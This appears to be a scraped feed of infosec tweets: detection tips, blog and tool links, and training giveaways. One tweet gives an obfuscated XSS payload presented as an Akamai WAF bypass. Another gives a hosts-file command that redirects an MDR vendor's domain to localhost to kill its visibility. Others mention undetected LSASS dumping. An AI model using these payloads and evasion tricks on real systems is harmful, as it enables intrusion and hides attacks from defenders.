Sysmon 10 with CallTrace contains seclogon (abused svc via fake client pid) + GAccess eq 14C0 & target is lsass is high likely an indicator of lsass handle obtention using malseclogon: PROCESS_CREATE_PROCESS PROCESS_DUP_HANDLE PROCESS_QUERY_INFORMATION x.com/splinter_code/…

Akamai WAF bypass <A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here

Introducing Sandbox Scryer: A Free Threat Hunting Tool | CrowdStrike crowdstrike.com/blog/sandbox-s…

Stealth trick for Red Teaming - why worry about being caught by an MDR (i.e., Artic Wolf, FireEye, etc.) when you can kill their visibility? 🧐 ipconfig /displaydns - Find API Endpoint echo 127.0.0.1 blahblah.fireye.com >> c:\windows\system32\drivers\etc\hosts

If you missed it and you look for a reading, please take a look here. Running is.gd/bDWdc0 #attack #cybersecurity #research

(1/25) Cryptography Fundamentals: Elliptic Curve Cryptography Elliptic Curve Cryptography is (one of) our strongest cryptographic tools, vastly more secure than its predecessors. But... how does the moon math at the center of modern crypto work? A layman's guide to Sci-Fi tech

Okay here's the deal. I'm giving away 100 TCM Security training courses. 50 of them are the Practical Ethical Hacking course, and the other 50 are Practical Malware Analysis & Triage. To enter: 1. Retweet this tweet 2. Follow Luke Stephens (hakluke), haksec.io and HackerContent Good luck!

Read @defte_'s Windows authentication token manipulation deep dive to compromise Active Directory in this new blog post. Includes a new tool and a CrackMapExec module using it as a, "token" of appreciation. sensepost.com/blog/2022/abus…

🎁 Monthly Giveaway🎁 Here are the prizes: • 1x 1-Month VIP+ Subscription Hack The Box • 3x 1-Month Subscriptions TryHackMe To participate: 👉 Like 👉 Retweet 👉 Follow Rob Simon Winners announced 11/18 Hack The Box #hackthebox #tryhackme #infosec #giveaway

Happy to share a new blog post I wrote about how I managed to dump LSASS undetected using a simple MiniDumpWriteDump against some of the most advanced EDRs in the market. "It’s all in the details: The curious case of an LSASS dumper gone undetected" dec0ne.github.io/research/2022-…

Wtf… we’re screwed.

We're giving away an OSCP voucher to our community.🎉 To participate : 1. Follow us on Twitter. 2. Retweet this post. 3. Like this tweet. It's that simple! By completing these steps, you'll be eligible to win. Also, register now at threatcon.io/pricing. #offsec #giveaway

Check out my first Splunk blog post! It covers key deliverables for #threathunting using the #PEAK Threat Hunting framework. I want to give a big shout out to David J. Bianco and the #SURGe crew for all the support! splunk.com/en_us/blog/sec…

Now available: "Uncovering Endpoint Compromise in Ransomware Attacks: Using Velociraptor to Investigate, Monitor, and Remediate Threat Activity." Learn how to use open-source software like Velociraptor to flexibly respond to a ransomware attack. ultimatewindowssecurity.com/webinars/regis…

#Phishing 🔖Regular expression to identify suspicious domain names regex101.com/r/sdeeTK/1 app.any.run/tasks/acc86ff5…

excellent example of impactful purple team notes 💪💜☁️

🧰 CVE PoCs A repo with almost every publicly available CVE proof of concept (PoC) By Trickest #cybersecurity #bugbountytips github.com/trickest/cve

I've developed a website that aggregates infosec blog posts, h1 activity, and info about fresh CVEs. You can suggest a useful RSS feed and I'll add it. Check it 👇 websecnews.github.io